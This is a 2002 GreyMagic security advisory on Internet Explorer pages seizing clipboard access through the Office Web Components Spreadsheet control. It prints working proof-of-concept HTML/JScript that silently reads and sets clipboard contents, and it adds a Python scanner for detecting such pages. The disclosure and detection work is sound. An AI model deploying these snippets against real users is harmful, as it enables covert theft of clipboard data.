
GreyMagic Security Advisory GM#007-IE

By GreyMagic Software, Israel.
08 Apr 2002.

Topic: Controlling the clipboard with OWC in IE.

Discovery date: 24 Feb 2002.

Affected applications:
Introduction:

Office Web Components (OWC) is a group of safe-for-scripting components used to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as a separate (free for viewing only) component.

Discussion:

It is well documented that IE lets any page read and write clipboard data by default; until now it was possible to disable this feature by setting "Allow paste operations via script" to "Disable".

It is now possible to gain control over the clipboard even when it is disabled in the security zone, via the Spreadsheet component in both OWC9 and OWC10.

The "Paste" method of the Range object and the "Copy" method of the Cell object both give an attacker full control over clipboard operations.

The attacker can continuously monitor the victim's clipboard and log the findings to a server for later inspection. It is also possible for an attacker to place data inside the clipboard.

Update (22-Aug-2002):

Microsoft has released a patch for these issues; however, the "Kill Bit" was not set for the vulnerable OWC version. This means that an attacker can easily reintroduce the old OWC, properly signed by Microsoft, and regain complete access to the vulnerabilities we found. And, unlike Microsoft claims, it is not that easy to notice it installing itself: an attacker can open an off-screen window that will silently install OWC without the user knowing.

This is a fundamental problem in the patch, and it renders the patch quite useless for users who set IE to trust content from Microsoft or who tend to click "Yes" when they see controls signed by Microsoft.

Exploit:

Reading the contents of the clipboard:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP" style="display:none"></object>
<script language="jscript">
onload=function () {
    // Paste to spreadsheet
    oSP.ActiveSheet.UsedRange.Paste();

    // Read the spreadsheet
    var oRng=oSP.ActiveSheet.UsedRange,
        iRows=oRng.Rows.Count,
        iCols=oRng.Columns.Count,
        sRes="";

    for (var iCRow=1;iCRow<=iRows;iCRow++) {
        for (var iCCol=1;iCCol<=iCols;iCCol++) {
            sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
        }
        sRes+="\n";
    }

    // Display result
    alert(sRes);
}
</script>

Assigning the clipboard's content:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP" style="display:none"></object>
<script language="jscript">
onload=function () {
    oSP.Cells(1,1).Value="Trustworthy computing";
    oSP.Cells(1,1).Copy();
}
</script>

The class id of the <object> element above is for the spreadsheet component of OWC9 (Microsoft Office 2000); OWC10's class id is "0002E551-0000-0000-C000-000000000046", and no further changes in the code are needed.

An attacker can actually use the fallback feature of the <object> element to include either one of these components:

<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10" style="display:none">
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9" style="display:none">
        <!-- None found -->
        Failed to load any of the spreadsheet components.
    </object>
</object>
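As an added defensive example (not part of the advisory or of OWC), the following content-inspection check flags pages that embed either Spreadsheet CLSID, including the nested fallback form shown above, and reports which clipboard methods (Paste/Copy) inline script calls through each element's id. The sample page it scans is constructed for this example from the advisory's snippets.

```python
import re
from html.parser import HTMLParser

# CLSIDs of the OWC Spreadsheet component given in the advisory.
OWC_SPREADSHEET_CLSIDS = {
    "0002E510-0000-0000-C000-000000000046": "OWC9 Spreadsheet (Office 2000)",
    "0002E551-0000-0000-C000-000000000046": "OWC10 Spreadsheet (Office XP)",
}

class _ObjectCollector(HTMLParser):
    """Collects every <object> start tag, nested fallback ones included."""
    def __init__(self):
        super().__init__()
        self.objects = []  # (normalised CLSID, element id)
    def handle_starttag(self, tag, attrs):
        if tag.lower() != "object":
            return
        attr = {k.lower(): (v or "") for k, v in attrs}
        clsid = re.sub(r"^\s*clsid:", "", attr.get("classid", ""), flags=re.I)
        self.objects.append((clsid.strip().strip("{}").upper(), attr.get("id", "")))

def scan_html(html):
    """One finding per OWC Spreadsheet <object>, with the Paste/Copy calls made through its id."""
    collector = _ObjectCollector()
    collector.feed(html)
    findings = []
    for clsid, oid in collector.objects:
        if clsid not in OWC_SPREADSHEET_CLSIDS:
            continue
        methods = []
        if oid:
            # e.g. oSP.ActiveSheet.UsedRange.Paste() or oSP.Cells(1,1).Copy()
            pattern = re.compile(r"\b" + re.escape(oid) + r"\b[^;\n]*?\.(Paste|Copy)\s*\(", re.I)
            methods = sorted({m.group(1).capitalize() for m in pattern.finditer(html)})
        findings.append({"clsid": clsid, "id": oid,
                         "component": OWC_SPREADSHEET_CLSIDS[clsid],
                         "clipboard_methods": methods})
    return findings

# Constructed sample page: the advisory's OWC10 -> OWC9 fallback nesting plus a script using both ids.
SAMPLE_PAGE = """<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10">
  <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9">
  </object>
</object>
<script language="jscript">
onload=function () {
    oSP10.ActiveSheet.UsedRange.Paste();
    oSP9.Cells(1,1).Value="x"; oSP9.Cells(1,1).Copy();
}
</script>"""
```

Running `scan_html(SAMPLE_PAGE)` yields two findings, one per CLSID, with "Paste" attributed to oSP10 and "Copy" to oSP9; a page without these CLSIDs yields an empty list.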

Solution:

Set "Run ActiveX controls and plug-ins" to "Disable" or simply remove/disable OWC until a patch becomes available.

Microsoft has been informed and has opened an investigation regarding this issue.

Tested on:

IE5 NT4 + Office 2000 (OWC9).
IE5.5 NT4 + Office 2000 (OWC9).
IE5.5 NT4 + OWC10.
IE6 Win2000 + Office 2000 (OWC9).
IE6 WinXP + Office XP (OWC10).

Demonstration:

Click on "Copy" to copy the string in the text input to the clipboard.

Click on "Spy" to start monitoring the clipboard; whenever the clipboard data changes, the new data will be shown in the list.


    Disclaimer:

    The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.

    Vulnerability details are provided strictly for educational and defensive purposes.

    GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
